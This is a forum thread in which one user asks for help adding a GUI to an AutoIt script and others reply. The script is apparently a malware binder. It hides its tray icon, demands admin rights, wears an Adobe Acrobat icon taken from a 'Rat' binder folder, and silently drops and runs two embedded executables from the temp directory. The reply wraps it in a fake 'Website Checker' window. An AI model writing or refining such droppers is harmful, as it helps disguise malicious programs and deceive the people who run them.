|
You last visited: Today at 19:22
Advertisement
someone to help me add the Gui in my scripts
Discussion on someone to help me add the Gui in my scripts within the AutoIt forum part of the Coders Den category.
07/01/2013, 03:51
|
#1
|
elite*gold: 0
Join Date: Apr 2013
Posts: 41
Received Thanks: 0
|
someone to help me add the Gui in my scripts
someone to help me add the Gui in my scripts
my scripts
PHP Code:
#NoTrayIcon
#RequireAdmin
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Icon=..\..\..\Rat\mFileBinder v1.0\Icon-Set\Adobe Acrobat Professional (Alternate).ico
#AutoIt3Wrapper_Outfile=2.exe
#AutoIt3Wrapper_Outfile_x64=33.exe
#AutoIt3Wrapper_Compression=4
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
FileInstall("test1.exe", @TempDir&"/test1.exe")
FileInstall("test2.exe", @TempDir&"/test2.exe")
Run(@TempDir&"/test1.exe")
Run(@TempDir&"/test2.exe")
|
|
|
07/01/2013, 05:26
|
#2
|
elite*gold: 0
Join Date: Nov 2011
Posts: 1,448
Received Thanks: 1,257
|
Code:
#NoTrayIcon
#RequireAdmin
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Icon=..\..\..\Rat\mFileBinder v1.0\Icon-Set\Adobe Acrobat Professional (Alternate).ico
#AutoIt3Wrapper_Outfile=2.exe
#AutoIt3Wrapper_Outfile_x64=33.exe
#AutoIt3Wrapper_Compression=4
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
FileInstall("test1.exe", @TempDir&"/test1.exe")
FileInstall("test2.exe", @TempDir&"/test2.exe")
Run(@TempDir&"/test1.exe")
Run(@TempDir&"/test2.exe")
#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("Website Checker", 230, 90, -1, -1)
$Button1 = GUICtrlCreateButton("Button", 152, 56, 65, 25)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
EndSwitch
WEnd
MfG
Kilroy.
|
|
|
07/01/2013, 06:35
|
#3
|
elite*gold: 0
Join Date: Apr 2013
Posts: 41
Received Thanks: 0
|
Quote:
Originally Posted by Kilroy.
Code:
#NoTrayIcon
#RequireAdmin
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Icon=..\..\..\Rat\mFileBinder v1.0\Icon-Set\Adobe Acrobat Professional (Alternate).ico
#AutoIt3Wrapper_Outfile=2.exe
#AutoIt3Wrapper_Outfile_x64=33.exe
#AutoIt3Wrapper_Compression=4
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
FileInstall("test1.exe", @TempDir&"/test1.exe")
FileInstall("test2.exe", @TempDir&"/test2.exe")
Run(@TempDir&"/test1.exe")
Run(@TempDir&"/test2.exe")
#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("Website Checker", 230, 90, -1, -1)
$Button1 = GUICtrlCreateButton("Button", 152, 56, 65, 25)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
EndSwitch
WEnd
MfG
Kilroy.
|
it does not work
|
|
|
07/01/2013, 14:42
|
#4
|
elite*gold: 95
Join Date: May 2011
Posts: 982
Received Thanks: 189
|
|
|
|
07/01/2013, 22:33
|
#5
|
elite*gold: 0
Join Date: Aug 2011
Posts: 263
Received Thanks: 177
|
Quote:
Originally Posted by mourad0009
it does not work
|
It Works.
|
|
|
Similar Threads
|
agBot Loop Scripts [ Let's Make alist with Mobs Scripts ]
07/09/2008 - SRO Hacks, Bots, Cheats & Exploits - 228 Replies
Hello Everyone,
i saw that everyone is getting stuck to make agBot Loop Script. so i though we should make a topic a mobs scripts. and i will start. :)
Now for me i prefer to use notepad to make my scripts.
How to install :
Just Copy the code and paste in <bot folder>\config\config1\script\default.lst
If we got more scripts, i will just make a webpage, where you can select Town, HP and MP Bots you wanna buy then the monster you want to kill. then it auto generate the script for you....
|
All times are GMT +1. The time now is 19:22.
|
|